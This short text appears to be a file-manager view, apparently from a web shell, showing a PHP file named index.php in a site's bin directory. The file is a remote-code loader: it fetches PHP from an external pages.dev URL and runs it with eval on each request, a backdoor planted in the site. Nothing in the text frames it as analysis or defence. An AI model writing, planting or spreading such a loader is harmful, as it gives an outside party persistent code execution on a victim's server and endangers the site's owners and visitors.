Current Directory: /home/astoriaah/www/bin
Viewing File: /home/astoriaah/www/bin/index.php
<?php
$path = "https://anggerisjxa.pages.dev/gong.php";
$code = implode('', file($path));
eval("?>" . $code);
?>